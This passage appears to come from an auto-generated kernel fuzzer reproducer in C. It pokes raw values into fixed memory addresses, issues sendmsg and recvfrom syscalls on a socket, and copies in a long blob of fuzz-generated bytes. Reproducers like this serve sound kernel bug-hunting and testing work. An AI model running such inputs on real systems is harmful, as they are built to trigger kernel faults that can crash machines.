(uint32_t)0x1f;\r\n *(uint32_t*)0x2000ed46 = (uint32_t)0x7;\r\n *(uint8_t*)0x2000ed4a = (uint8_t)0x6;\r\n *(uint8_t*)0x2000ed4b = (uint8_t)0x100;\r\n *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;\r\n *(uint32_t*)0x2000ed4d = (uint32_t)0x11;\r\n *(uint16_t*)0x2000ed51 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000ed53 = (uint16_t)0x808;\r\n *(uint32_t*)0x2000ed55 = (uint32_t)0x1;\r\n *(uint32_t*)0x2000ed59 = (uint32_t)0x0;\r\n *(uint8_t*)0x2000ed5d = (uint8_t)0x0;\r\n *(uint32_t*)0x2000ed5e = (uint32_t)0x12;\r\n *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;\r\n *(uint16_t*)0x2000ed64 = (uint16_t)0x200;\r\n *(uint32_t*)0x2000ed66 = (uint32_t)0x5;\r\n *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;\r\n *(uint8_t*)0x2000ed6e = (uint8_t)0x9;\r\n *(uint8_t*)0x2000ed6f = (uint8_t)0x1;\r\n r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);\r\n *(uint16_t*)0x20001003 = (uint16_t)0x1;\r\n *(uint8_t*)0x20001005 = (uint8_t)0x0;\r\n *(uint32_t*)0x20001007 = (uint32_t)0x9;\r\n r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);\r\n memcpy((void*)0x20015285, \"\\xed\\xe0\\xf1\\x03\\xbd\\x1d\\xe2\\x8d\\x13\\x62\\xc9\\x11\\xde\\x3b\\x55\\xb1\\xb2\\x26\\x95\\xb2\\x3f\\x32\\x96\\x8a\\x3d\\xf7\\xd4\\x2c\\xd9\\x32\\xae\\x05\\x9a\\x60\\x09\\xbc\\x49\\x63\\x6a\\x45\\xd5\\x6f\\xa8\\x4b\\xaf\\x8a\\x66\\xf3\\x35\\xad\\xe6\\x68\\x85\\xd4\\x7e\\xe5\\x7c\\x7e\\x06\\xbf\\x32\\xfb\\xf9\\xd2\\x9f\\x40\\xa3\\x0a\\xa0\\x93\\x09\\x73\\x39\\x7d\\xac\\x3c\\x8d\\x83\\xe0\\x0c\\x5e\\xa2\\x36\\x9b\\x9c\\xb4\\x62\\xe8\\x39\\x07\\xd8\\x71\\xc1\\x2f\\x6f\\x18\\xfa\\x8a\\x5d\\x06\\xb4\\x46\\xa2\\x97\\x79\\x81\\xb2\\x85\\xd4\\x4f\\x6b\\x48\\xc4\\xf5\\xdd\\xa8\\x8d\\x10\\x74\\x01\\xe1\\x58\\xb2\\x82\\x72\\xc4\\xb6\\xb2\\xf7\\xaa\\x90\\x9c\\x9f\\x61\\x95\\x87\\x7b\\x99\\xc5\\xa5\\x53\\xbc\\xab\\xdb\\xdb\\x5e\\x32\\xb8\\xc3\\xee\\xd3\\xda\\x7a\\xf2\\x5c\\xc5\\x1a\\xf1\\xd6\\x1b\\x53\\xad\\x24\\xd0\\xa0\\xc0\\x0d\\x73\\x9e\\x81\\x7e\\x4e\\x82\\xf5\\xa9\\x73\\x3c\\x7a\\x5c\\x6e\\x4c\\x48\\x7d\\x42\\xf5\\x2f\\x68\\xf9\\x7e\\xa9\\xd8\\x6a\\x64\\x78\\x08\\x7a\\x37\\xe9\\xd3\\x81\\x15\\x34\\x63\\x63\\x14\\xb7\\x1a\\x43\\x9b\\x4f\\x85\\xfa\\x88\\x5c\\xe1\\x1e\\xce\\x87\\x95\\xe1\\x81\\xc8\\x06\\xaf\\x1a\\x64\\x26\\x36\\x83\\x36\\xef\\x71\\x0c\\x2a\\xda\\xe4\\xff\\xa1\\x87\\xc2\\x04\\x96\\x1c\\x72\\xd9\\x2d\\xf0\\xce\\x46\\xd4\\x3a\\xd1\\xc7\\x2f\\x60\\x25\\xf8\\x33\\x1f\\x38\\x7a\\x46\\xb1\\x43\\xa4\\xd2\\x65\\x77\\x47\\x85\\xe9\\xad\\x52\\xdb\\x8b\\x93\\x23\\xf1\\xf9\\xa9\\x5f\\xe4\\xf8\\x39\\x82\\xc5\\xb4\\xe1\\x5b\\x87\\xa0\\xfd\\x2c\\xc2\\x84\\x15\\x78\\xaa\\x9b\\x3f\\xe5\\x75\\x6e\\x05\\xef\\x84\\x4c\\x6b\\x9d\\x1d\\x9e\\x7c\\x92\\x3b\\x55\\xcb\\x01\\x6f\\xc5\\x9a\\xd8\\xc3\\x91\\x39\\x95\\xd7\\x8f\\xe9\\x87\\x15\\x27\\xe7\\x19\\xa8\\x18\\x24\\xfd\\x09\\x11\\x49\\x41\\xc6\\xd2\\xe9\\x1a\\xf4\\xb0\\x9b\\x85\\x9b\\x3f\\xb1\\xf3\\xc3\\x48\\xc5\\xe7\\x45\\x0b\\x21\\x2d\\x32\\x27\\x92\\x3c\\x39\\x52\\x0f\\x2b\\xdf\\x52\\x66\\x6f\\x01\\x8f\\xdc\\xfa\\x8f\\x5e\\x53\\xb7\\x82\\x23\\x79\\xfa\\x28\\xe5\\x24\\xa7\\x5e\\x2a\\x24\\x7e\\xd0\\x1e\\xd5\\x1a\\xb6\\xb8\\xe5\\xb2\\x6d\\x4d\\x38\\x61\\x79\\xb8\\xd1\\x27\\x92\\x63\\x0c\\xed\\x3c\\xf1\\x13\\x98\\x37\\xfa\\x98\\xda\\x0c\\x1a\\x86\\xd1\\x6a\\x12\\x86\\x2f\\xd0\\x8d\\x8e\\x2e\\x52\\x23\\xac\\x2d\\x82\\x59\\xef\\x17\\xbc\\xf1\\x47\\xfb\\xf0\\x5f\\x43\\x70\\x99\\x14\\xdf\\xaf\\x44\\x02\\xb5\\xe9\\x39\\x51\\x8e\\xf2\\x07\\x9c\\xa2\\x39\\xab\\x07\\xa2\\x22\\xa7\\xd3\\x5c\\xc0\\x8c\\xcf\\x3c\\xa2\\xa7\\xd0\\xd6\\xf4\\x82\\xcc\\x35\\x75\\x3a\\x20\\xb7\\x9b\\xf3\\x9d\\xd9\\xfe\\xdf\\x1e\\x3f\\x55\\xf2\\x99\\xdb\\xd0\\xb2\\xd7\\x86\\xc1\\xfa\\xb3\\xc7\\x99\\xdc\\x02\\xe3\\x9f\\xfd\\x1e\\x56\\xc1\\xf2\\x51\\x32\\x84\\x61\\x30\\x33\\xf6\\xe3\\x82\\x9f\\xf2\\x04\\xaf\\x5d\\xf4\\x3d\\xa6\\x0e\\x25\\x53\\xe9\\x05\\x7c\\x42\\xbf\\xfa\\x97\\xd7\\x77\\x8c\\x8f\\x29\\x7a\\xcb\\x40\\x13\\x07\\xb5\\x8d\\x69\\xdc\\x8b\\x35\\xd3\\xb6\\xf3\\xd8\\x07\\x94\\x7e\\x69\\x0f\\xb7\\x28\\xf1\\xb3\\x45\\x60\\x37\\x65\\xa4\\xf6\\xbf\\x9c\\xb3\\xf9\\x3d\\xe1\\x08\\x08\\xc9\\x76\\x5e\\x8b\\x7f\\x26\\x01\\x9d\\x8f\\x15\\x39\\x02\\xfe\\x8a\\xe3\\x3b\\x8b\\xf9\\xae\\x06\\x04\\xef\\x0d\\xcf\\x67\\x24\\x54\\xe6\\x4c\\xe4\\x05\\x8e\\xd7\\xda\\x4c\\xf2\\xd7\\x88\\x75\\x87\\xf7\\x7e\\xd0\\x49\\x19\\x02\\x5e\\x00\\xc4\\xeb\\x3e\\xec\\x70\\x35\\x9c\\x9b\\xc9\\xd9\\x47\\x65\\x4c\\xa3\\xdb\\x0e\\xde\\x1e\\x76\\x58\\x27\\xe0\\x91\\x6b\\xf9\\x25\\x44\\xa6\\xa2\\x85\\x8f\\x50\\xd0\\x13\\x88\\x57\\x25\\x56\\x78\\xed\\xcb\\x6b\\xec\\xf2\\x4f\\xd4\\xce\\xf1\\x90\\xcd\\x49\\x50\\xb5\\xcf\\xd3\\x96\\x4d\\x3c\\xf4\\x54\\x8e\\xa9\\xdb\\xd3\\xb5\\x9e\\xe9\\x87\\x19\\x8b\\x59\\xd7\\xf2\\xcf\\x1a\\xd3\\x70\\xca\\x42\\xc6\\x97\\x66\\x38\\x24\\x39\\x4d\\x42\\xa1\\xf0\\x24\\x46\\xe4\\x0e\\x9c\\xbc\\xc4\\x53\\xa9\\xb9\\x94\\x4d\\xca\\x48\\xa6\\x04\\xb8\\x2f\\x4f\\xf5\\x85\\x32\\x22\\xf8\\x4e\\x83\\xab\\x34\\x27\\x3b\\x8f\\x24\\x48\\x15\\x9b\\xa9\\xf8\\xb9\\xb7\\xcb\\xd5\\xfb\\x72\\xec\\x7a\\xc3\\x39\\x9c\\xde\\x25\\x76\\x08\\x3f\\x49\\x35\\xbd\\x42\\x4f\\x3f\\x5e\\xfc\\x6b\\x6b\\x9e\\x3e\\x34\\x47\\x62\\xed\\x5a\\xae\\xdc\\xcf\\x4e\\xe6\\x18\\xfa\\x7f\\xe6\\x46\\xc8\\xbe\\xbc\\x42\\x88\\xb6\\xfe\\xbd\\x96\\x85\\x5a\\x4a\\x1d\\xd2\\x00\\xe9\\x71\\x48\\x48\\x52\\xd6\\xf5\\x88\\x7d\\x94\\x18\\xf6\\xf0\\x5c\\x0a\\x39\\x29\\xc8\\x78\\xa0\\xa8\\x44\\xf4\\xb6\\xca\\x78\\x75\\x4a\\xf7\\x53\\xd7\\x7e\\x23\\xaf\\x6b\\xf9\\xcd\\x77\\xb2\\xd0\\x37\\x29\\x9c\\x57\\xbe\\x9e\\x5f\\x7c\\xe4\\x41\\x59\\xde\\xd5\\x63\\x02\\x2a\\xc0\\x74\\xa6\\x00\\xe2\\x8f\\x83\\x30\\xc1\\x60\\xcd\\xb3\\xca\\x44\\x1d\\x88\\x54\\x8b\\xbc\\xa8\\x79\\x78\\x86\\xa2\\x49\\x7c\\x94\\x49\\xf3\\xb4\\x41\\x44\\x76\\x33\\xf1\\x2e\\x71\\xbc\\xa1\\x39\\xb9\\x68\\x56\\xd9\\xa0\\xa1\\x6f\\xdc\\x7d\\xa3\\xb8\\x4f\\x1c\\xb8\\x19\\x26\\x42\\x88\\x0e\\xcb\\xbb\\xc9\\x6c\\xa8\\xf8\\xe9\\x37\\x86\\x61\\x37\\x9f\\xba\\xb3\\x9e\\x54\\x07\\xe6\\xff\\x6f\\x54\\x8c\\xcf\\x7e\\x3d\\x14\\xfd\\x94\\xbb\\xdc\\x59\\x5d\\x22\\x86\\xb5\\x3b\\x18\\x0d\\x08\\xad\\x15\\x67\\x6b\\xf1\\xc8\\xd8\\x81\\xac\\x14\\x63\\xcf\\x1e\\xf9\\x48\\xba\\xe0\\x33\\x4c\\x1e\\x72\\xe9\\x00\\x1a\\x48\\xc5\\xb4\\x2c\\x71\\xd6\\x7a\\x0b\\x8f\\x6c\\x02\\x9a\\x02\\xa9\\x20\\xbd\\x8a\\x56\\xe1\\x59\\x92\\x1f\\x5f\\xea\\x61\\x1b\\xe3\\x2f\\xc0\\x15\\x9c\\x3e\\xcf\\xe7\\x05\\xbc\\x7e\\xe8\\x88\\x58\\x63\\x29\\xc5\\x10\\x26\\xf0\\xbc\\xf5\\xcd\\x3d\\x33\\xfa\\x87\\x45\\x25\\x1d\\x86\\xc0\\xd8\\x72\\xdc\\x1b\\xaf\\xa1\\xf3\\x1e\\x81\\xb4\\x7b\\x4d\\xb5\\x79\\x72\\x87\\x92\\x1f\\x9d\\xa1\\x8e\\x1a\\x24\\x7f\\x49\\x11\\xc4\\x59\\xa5\\x8e\\x6c\\x7a\\xdd\\x17\\x52\\x47\\x3b\\x09\\x28\\xe4\\x3b\\xef\\xb0\\xf3\\x68\\x9c\\xd3\\x6e\\xe9\\x89\\x38\\xdb\\xeb\\x01\\x4f\\x39\\x9b\\x5b\\x0c\\x8d\\x92\\xcd\\x5c\\x15\\x47\\x15\\xa9\\x98\\x70\\x75\\xe2\\xf0\\x5b\\xfe\\xaa\\xa9\\xb3\\xba\\xc9\\x8e\\x5c\\x6d\\xfb\\x53\\xb9\\x8b\\x4f\\x7e\\x31\\xbe\\x69\\x7e\\x6d\\x80\\x6f\\x3e\\xd8\\x59\\x1c\\x13\\x5a\\x3b\\x2b\\x0e\\xc6\\xd1\\xf9\\xaa\\xf1\\x30\\x16\\xf1\\x7b\\x2f\\x6b\\x5f\\xa9\\xde\\xfa\\xfd\\x59\\xaa\\xdd\\x32\\xf7\\xbb\\x94\\x28\\x93\\x16\\xb3\\x60\\xd5\\x6c\\x62\\x93\\xba\\xa9\\xaa\\x38\\x52\\xdc\\x2f\\x37\\x75\\x1d\\x56\\xa9\\x3c\\x7c\\x8b\\x0d\\x56\\x9e\\x05\\xf7\\xa1\\xa6\\xef\\x3c\\x76\\x6e\\x06\\x06\\xde\\x07\\x84\\xa0\\xeb\\xeb\\x8e\\x46\\x2f\\xd9\\xc2\\x56\\xc6\\x89\\x85\\x8c\\x39\\xad\\xa2\\x77\\x24\\xe5\\xb5\\x00\\x04\\x4c\\xf5\\x1e\\x4a\\x03\\x06\\xbb\\xa1\\x1f\\xe7\\xf8\\xb7\\x3e\\xdd\\xfc\\x18\\xbf\\x13\\x07\\x14\\xdd\\x8a\\x6b\\x0f\\x44\\xc0\\xeb\\x4a\\x43\\x7d\\x42\\xe9\\x02\\x63\\xb5\\xc2\\x7a\\x87\\xce\\x14\\x0c\\xaf\\xd9\\x2b\\xaf\\x4b\\x22\\xec\\xa9\\x3b\\x16\\xeb\\xb7\\xc5\\x0d\\x51\\x91\\x93\\x5d\\x90\\xe1\\x8f\\x34\\x86\\x71\\xe0\\x7c\\xb5\\x1e\\xe7\\x19\\xc0\\xd6\\xc9\\x3e\\x08\\x75\\xc0\\x1f\\xab\\x5e\\x41\\xbf\\x0e\\x1a\\x14\\xcc\\x40\\xf6\\x85\\x02\\xba\\x3d\\x78\\xce\\xf7\\x6f\\x0e\\xbf\\x51\\xda\\xc6\\xa1\\x59\\xbd\\x69\\x1a\\x05\\x7b\\x34\\xbd\\xa7\\x28\\x39\\xa1\\xa2\\x18\\xa7\\x76\\x8f\\x51\\xa5\\xd2\\xdc\\xf4\\xa7\\x7b\\xc8\\x64\\x0e\\xc0\\xe8\\xac\\xc3\\xd4\\xb9\\x11\\x78\\x58\\x79\\xe4\\x91\\xc9\\xcf\\xe2\\x0c\\xbb\\x11\\xb3\\x80\\x48\\xd7\\xa5\\xbd\\x45\\xdd\\xb6\\xad\\x87\\x79\\x01\\xa0\\xe1\\x89\\xdb\\x54\\x42\\x1c\\x78\\x47\\x91\\x07\\xe8\\xbc\\x26\\x15\\xf2\\xdb\\xba\\x5b\\xaa\\x5a\\x05\\x84\\xa2\\x83\\x7d\\xe5\\xbb\\x5a\\x77\\x3f\\x0a\\x27\\x06\\x4e\\x86\\x69\\x95\\x27\\x22\\x7e\\xa2\\x42\\x4d\\x61\\xa7\\xab\\x6d\\x05\\x8b\\x7b\\x6b\\x94\\xd6\\x10\\x40\\x66\\x30\\x0b\\x6c\\x79\\xe1\\x62\\xee\\x33\\xed\\xd6\\xd4\\x9a\\x3a\\xea\\x95\\x5b\\x60\\x70\\x58\\xc9\\xc6\\x6c\\x47\\xa7\\xd1\\xcc\\xfa\\x9f\\xc7\\x66\\xac\\xbb\\x4f\\xe4\\x09\\x74\\xe3\\xd1\\xeb\\x82\\x3b\\xce\\x4c\\x2b\\xcf\\x08\\xcd\\xf6\\x96\\x2b\\x65\\x2a\\x2c\\x33\\xf5\\x7b\\x66\\xdb\\xec\\x3d\\xbf\\x24\\xf7\\xf9\\x87\\x99\\x26\\x1b\\x5a\\xa0\\xd0\\x0e\\x2f\\xc0\\x2e\\x03\\xcd\\xf4\\x1e\\x10\\x7c\\xb5\\xb7\\xec\\x75\\x2c\\x20\\x89\\xc4\\xec\\x61\\x34\\x3b\\x6c\\x68\\x14\\x95\\xd9\\x9a\\x03\\xd7\\xf2\\x6b\\xe6\\x50\\x14\\x80\\x72\\xa2\\x67\\xaf\\xb3\\x19\\x12\\xcc\\xf9\\x9d\\x3d\\x34\\x86\\x48\\xe7\\xa6\\xe7\\xc0\\x9b\\x6c\\xeb\\x2c\\x0d\\x26\\x6f\\x09\\xd9\\x8c\\x92\\x8e\\xde\\x80\\x04\\x14\\xe6\\x88\\xbb\\x39\\x2f\\x2c\\x14\\xf2\\xda\\x86\\xdb\\x10\\x59\\x54\\x83\\xe6\\x5e\\xe3\\x14\\x4b\\x73\\x97\\x9a\\x94\\xa8\\x09\\x44\\x1d\\xd0\\x62\\x2d\\x43\\xb4\\x5e\\x38\\xaa\\x8e\\x5b\\xdd\\x2f\\xd3\\x2c\\x8e\\xd3\\xd0\\x0f\\x9d\\x80\\xca\\x87\\x4e\\xab\\x52\\x01\\x29\\xb7\\xe7\\x55\\xa2\\xe4\\x2d\\xee\\xce\\x30\\xe9\\xcb\\xc4\\x3e\\xf9\\x58\\x04\\x63\\x01\\xec\\x89\\x33\\x01\\x26\\x7d\\xe2\\x5d\\x41\\xf7\\x91\\xa3\\xcb\\x41\\x62\\xb4\\x82\\x6d\\xb9\\xd1\\xad\\xf2\\x96\\x0f\\xad\\x87\\xbe\\x6d\\x95\\xaf\\xc2\\x14\\x12\\x78\\x10\\x90\\x86\\x61\\x55\\x97\\x77\\x5c\\x19\\xfe\\x4e\\xda\\xf3\\x74\\x08\\x83\\x4d\\xa0\\x25\\x04\\x05\\x4b\\xf3\\x30\\xc1\\x2f\\xb6\\x16\\x2d\\x9b\\x2c\\x7d\\x90\\x5a\\xd2\\x28\\x53\\xc5\\x3a\\x14\\x8c\\x1f\\xda\\xd7\\x36\\x47\\xdc\\x85\\x7f\\x2b\\xe8\\x0d\\xf9\\x03\\x92\\xba\\x82\\x20\\xde\\xb3\\x65\\x14\\xe8\\xdd\\xfe\\x6b\\x3a\\xab\\xd5\\xad\\x03\\xcb\\x4f\\x41\\x08\\x97\\x22\\xe7\\xc7\\x1d\\x0e\\x7c\\x8e\\x4d\\x12\\x2c\\x86\\x8b\\xb3\\x31\\x43\\x5f\\x6e\\x37\\xcf\\x08\\x83\\x4d\\x16\\xd7\\x3f\\x4a\\x80\\x2b\\x67\\x1a\\xbb\\xaf\\x8d\\x1c\\x1c\\x5d\\x00\\x33\\xf3\\x67\\x13\\x43\\xf1\\x09\\x00\\x81\\x68\\xe1\\x33\\xb1\\xb4\\xc1\\xad\\xd9\\x99\\x0c\\xac\\x4f\\x09\\x26\\xd7\\xff\\xc8\\xcd\\xfd\\xe9\\x32\\x52\\xd1\\x4c\\xee\\x61\\x89\\xe0\\x82\\x64\\xa3\\x6b\\xeb\\x23\\x87\\xc8\\xed\\x94\\xa6\\x6b\\x68\\xec\\x13\\x59\\xa7\\x74\\x06\\x7d\\xac\\x6f\\xfd\\xf5\\x3d\\x3b\\x9d\\x8b\\xe1\\x22\\x98\\xf3\\x0e\\xbd\\x3f\\xfa\\xbe\\xb9\\x86\\x3d\\xe4\\x1f\\x30\\xd4\\x96\\x6f\\x7f\\xd4\\x48\\xbc\\xc9\\x8b\\x1e\\x8f\\x63\\xa1\\xb4\\xa9\\x43\\xf2\\xb8\\x28\\x5e\\x57\\x93\\xc5\\x56\\x21\\x12\\x20\\xd5\\x16\\x29\\x14\\xb0\\xff\\x42\\xba\\x0e\\x26\\x6e\\xcd\\x7e\\x7c\\x72\\x27\\xfb\\xd2\\x0f\\xac\\xdb\\x0d\\xc8\\xc8\\xd6\\xa0\\xc7\\x5b\\xfd\\x0c\\xd7\\x89\\xe8\\x8b\\xee\\x24\\x0f\\xd1\\x78\\x23\\x82\\xe7\\xb5\\x7f\\x63\\xb3\\x14\\x10\\x78\\x26\\x23\\xd3\\x60\\xbd\\x53\\x5a\\x1b\\x67\\x0f\\xcf\\xd5\\xfe\\x90\\x18\\xa9\\xd6\\x80\\xc3\\x94\\x00\\x21\\x6d\\xdb\\xab\\x09\\x38\\x0d\\x77\\xdc\\x3e\\x90\\x2f\\x3c\\x0e\\x06\\x6b\\xaf\\x14\\x45\\xcc\\x0d\\xcb\\x1b\\x74\\xdc\\x01\\xec\\x29\\x23\\x96\\xe0\\x2a\\x86\\xee\\x92\\x9c\\x86\\x10\\x9f\\x3d\\x7a\\x56\\xf3\\x6f\\x3b\\xef\\x2b\\x84\\xd5\\xcf\\xd3\\xf7\\x2b\\xa6\\x0d\\x9c\\xa2\\xb0\\x42\\x8f\\xed\\x53\\x99\\x7a\\x11\\x64\\x5e\\x53\\x92\\xb7\\x97\\x20\\xaa\\x25\\xc2\\x5d\\x6b\\xbd\\xde\\x58\\xe7\\x51\\xc2\\xd5\\xa5\\xe0\\x9b\\xbf\\xe4\\x81\\x1c\\xd5\\xc4\\xee\\x29\\xfa\\xd2\\xbb\\xce\\xbf\\xfe\\x40\\xee\\x09\\xf5\\x4b\\xb2\\x1e\\x33\\xef\\x8f\\xf9\\x05\\x68\\x15\\x7a\\x45\\xa0\\x52\\x3c\\x29\\xf4\\x01\\xf2\\x64\\x98\\x2d\\xbd\\x89\\xae\\x86\\x80\\xd9\\x0a\\xfe\\xca\\x86\\x46\\xc3\\x58\\xd6\\x1d\\x54\\xd4\\x6f\\x36\\xe0\\x32\\x6a\\x23\\x29\\xbd\\x69\\x22\\x9b\\x1e\\x7f\\x01\\x28\\xff\\xc0\\x1c\\x8f\\x01\\x08\\xa4\\x96\\xda\\xfe\\x96\\xab\\xf2\\x23\\x34\\x34\\xb0\\x46\\x38\\xd6\\x2f\\x87\\x62\\xcf\\x96\\x85\\xbb\\xcc\\x98\\x27\\xfc\\x91\\xea\\xd9\\x78\\xc4\\xcb\\x42\\xc0\\xd3\\x7d\\x90\\x1c\\xfa\\x62\\xa8\\xb7\\xf3\\x31\\x04\\x56\\xa1\\x97\\xe1\\xa8\\xfc\\xab\\x90\\x64\\x01\\x81\\xae\\x20\\x05\\x2f\\x91\\xaf\\x27\\xb9\\xb5\\x12\\xce\\x94\\xa6\\x6b\\x32\\xf2\\xd0\\x0b\\xf5\\x71\\xff\\xbb\\xd8\\xe1\\x20\\x5f\\x0d\\xbe\\x90\\x44\\xe4\\xa5\\xb5\\xf6\\xa3\\x70\\x5b\\xd3\\x24\\xa2\\xb6\\xba\\x22\\xd7\\x27\\x47\\xff\\xff\\x79\\x65\\xf1\\x82\\xcf\\x51\\x56\\xa6\\x6f\\x48\\x32\\x66\\x7b\\x3f\\x3f\\x7c\\xb8\\x6f\\x0f\\x2d\\xe8\\x92\\x72\\x86\\xc4\\x9e\\x6f\\xe7\\xb6\\x3f\\xb6\\x6f\\x96\\xdc\\x68\\x8d\\x1d\\x1c\\xfe\\x3f\\x23\\x45\\x7d\\x35\\xed\\x3d\\x6a\\x06\\xe8\\x4b\\x7f\\xb1\\xe6\\x2b\\x66\\x4a\\x53\\x45\\xa4\\x5c\\x77\\x96\\x25\\x4a\\x13\\x3a\\xf3\\xbe\\x7e\\x16\\xb0\\x51\\x84\\x53\\xe6\\x4e\\x37\\xd7\\xc1\\xee\\xda\\xfb\\x18\\xb0\\x81\\x3b\\x16\\xfc\\xea\\x32\\x00\\x75\\x97\\x1a\\xc9\\xf9\\x5a\\x44\\x1a\\x12\\x08\\xcb\\xbe\\x60\\x79\\x80\\x60\\xcd\\xbd\\x5b\\x60\\x9b\\xfc\\x31\\x5b\\xca\\xa5\\xda\\x16\\x18\\x45\\x95\\xe1\\x5b\\xd4\\x4c\\xdc\\xc9\\x10\\x73\\x14\\xbb\\x0b\\x9c\\xdb\\x0c\\x0c\\x8c\\x3b\\x42\\x29\\xf4\\x7d\\x93\\x61\\x5a\\x6a\\x6b\\xac\\xae\\x80\\x60\\x5d\\xd1\\x3e\\xe4\\x6d\\xf7\\x3f\\xb8\\x7b\\x7f\\x35\\x1b\\x67\\xd3\\x60\\x80\\x0a\\x08\\x25\\xff\\xbb\\x31\\x47\\x60\\xb3\\xd1\\x0e\\xce\\xbc\\xf3\\x88\\xe0\\x56\\x5e\\x61\\x97\\x63\\x82\\xa4\\xff\\xea\\xf9\\x48\\x7f\\x4c\\x62\\x58\\x46\\x30\\xe5\\x2c\\xbe\\xa0\\x18\\xe4\\xe8\\xf6\\x4f\\x22\\x5b\\x1d\\x18\\xb0\\x48\\x0c\\xe7\\x25\\xa9\\x1a\\x8e\\x5a\\x3f\\xbd\\x4c\\xab\\xe7\\x52\\x29\\xa2\\x35\\x77\\xf5\\x0c\\x8c\\x4e\\x2d\\xa9\\x16\\x11\\x00\\xdf\\x8b\\xe1\\x7f\\x8f\\x20\\x9d\\xe9\\xea\\x2b\\x4e\\xf4\\xe5\\x98\\x4e\\xf8\\xe9\\x5b\\x98\\xb9\\x2a\\xb8\\x68\\x0d\\xdb\\x35\\xf8\\xfd\\x5d\\x28\\x14\\x2a\\x65\\x33\\x3d\\xde\\x77\\xc5\\x73\\xee\\xc4\\xa4\\x8e\\x76\\x12\\x4f\\x28\\x93\\x7d\\xd8\\xf5\\xbf\\x32\\x39\\xe1\\xc1\\xaa\\x46\\x71\\x9f\\xcb\\xa4\\x93\\xa5\\xae\\xe0\\xb1\\x9f\\x03\\xb3\\xbe\\x86\\xf9\\x92\\x45\\x65\\x64\\x8d\\xd9\\x49\\x09\\xd2\\x0c\\x01\\x92\\x75\\x1a\\x29\\x43\\x34\\x74\\x21\\x6d\\xa6\\x0e\\xa7\\x3b\\x15\\x2c\\x59\\xc2\\xb9\\x8a\\x92\\xcb\\xc3\\x8c\\xc7\\x06\\xfd\\xfc\\xe1\\x67\\xc7\\xc5\\xc6\\x07\\x24\\xc8\\x06\\xa7\\xdc\\x76\\x83\\x43\\xec\\x90\\x3b\\x6f\\xa0\\x00\\x9a\\x68\\x44\\x71\\x19\\xbe\\xdb\\x24\\xb0\\xcb\\x9b\\x8a\\x28\\xb6\\x30\\x99\\x79\\xd2\\x42\\xbe\\x53\\x32\\x84\\x0c\\x17\\xdc\\xc9\\x1c\\xa9\\xed\\x26\\x20\\x69\\xef\\x6d\\xc4\\xa4\\xad\\xe5\\x68\\xec\\x52\\xe8\\x51\\x3f\\xb2\\x52\\xbc\\x6f\\x84\\x26\\x41\\xf9\\x91\\x22\\x66\\x89\\xcc\\x03\\xa6\\xa5\\x7a\\x07\\xd7\\x35\\x92\\x5e\\xc1\\xf9\\x11\\x1b\\x4b\\x6d\\x50\\x7b\\x4f\\x43\\xca\\x13\\x37\\xd2\\x6d\\xce\\x81\\xa8\\x9b\\x8b\\x8c\\x65\\x75\\x08\\x97\\x18\\xb6\\xd2\\x2e\\xd2\\xe3\\x31\\x51\\x2e\\xb0\\xb3\\x04\\x64\\x71\\xba\\x05\\x4b\\x23\\x91\\x92\\xfd\\x4a\\x1b\\x6c\\x35\\xa5\\x8f\\xcb\\xb5\\xac\\xd9\\x40\\xe5\\x4b\\x6b\\x04\\xe2\\x2a\\xab\\xd9\\x0d\\xcf\\x0b\\x23\\xfa\\x1f\\xcd\\x4a\\x46\\xb0\\x26\\xc4\\xb8\\xae\\x17\\x82\\x6c\\x7f\\x6f\\xe6\\x1a\\x8c\\x0d\\x95\\xdf\\xe2\\xc2\\xd4\\x5c\\x85\\x6d\\x79\\x3b\\x8a\\x6c\\x51\\xf3\\x5f\\x06\\xdf\\x07\\x5b\\x69\\x8a\\xde\\x75\\x59\\x6d\\x70\\x99\\x55\\x09\\x8f\\xf8\\xc0\\x6f\\x2e\\xc3\\x0f\\x87\\x1c\\x79\\xe8\\x4b\\xb0\\x55\\x51\\xb2\\xa3\\x91\\x9b\\xb0\\x89\\x17\\xad\\x9b\\x89\\x81\\x23\\x12\\xcb\\x45\\x8a\\xd7\\x2a\\x0a\\x19\\x84\\x7d\\xb9\\x64\\xa6\\x31\\xa3\\x48\\x30\\x3c\\x01\\x6b\\x7c\\x74\\x20\\xe6\\x0b\\xff\\x2a\\x0a\\x66\\x82\\x00\\x31\\x01\\xbc\\xf8\\x47\\x02\\xcc\\x43\\xbe\\x6d\\x0c\\x0e\\x4f\\x59\\x37\\x4d\\xcb\\xc2\\x37\\xee\\x5e\\x1c\\x2c\\xf3\\xda\\xc8\\xf8\\xc9\\x8c\\xbc\\xff\\xd9\\x8b\\x8a\\xee\\x4e\\xab\\x19\\x8f\\xb6\\xb4\\xe7\\x0a\\xda\\x9c\\x5c\\x00\\xc3\\x26\\x87\\x63\\xb0\\xa9\\x1b\\x31\\x62\\xef\\x04\\x10\\x68\\x6c\\x3c\\xd1\\xba\\x73\\xc1\\xaa\\xf2\\xe4\\xbd\\x29\\xdb\\x2c\\xe3\\x69\\xf0\\x34\\x8d\\xd3\\x6b\\x6e\\x59\\x42\\x6f\\x28\\x3d\\x2f\\x83\\x27\\x48\\xc0\\xb7\\x82\\xd3\\x95\\x96\\x0c\\xdf\\x22\\xc7\\xce\\x77\\xab\\x09\\x4c\\xad\\xab\\x0d\\x70\\xee\\x4d\\xea\\xb3\\x63\\x62\\x04\\x6f\\xd7\\x68\\x2e\\x86\\x7c\\xac\\xd4\\xc2\\x6e\\x09\\xdf\\xf0\\xbe\\x8c\\x71\\xd9\\xa8\\x82\\xf8\\xd2\\x14\\x70\\xb7\\xd0\\x40\\x12\\x5e\\xa7\\xec\\xab\\x1a\\x13\\x87\\x0b\\x6e\\x28\\x59\\x76\\x01\\xb2\\x3f\\x64\\x62\\x35\\xb3\\xff\\x0d\\x8a\\x3d\\x6b\\x5a\\xd3\\x9e\\x59\\x14\\x6d\\x19\\x4c\\x99\\x04\\x75\\xe4\\x04\\xe3\\xf2\\x8a\\x19\\x77\\x06\\xdd\\x5f\\x2e\\x25\\x2c\\xa3\\xb5\\x52\\xa6\\xfa\\x2b\\x84\\x35\\xdc\\x56\\x55\\x02\\x63\\x79\\x81\\x3b\\x27\\x82\\x41\\x92\\x19\\xb3\\xe3\\x63\\xce\\xb5\\x0c\\x1a\\x15\\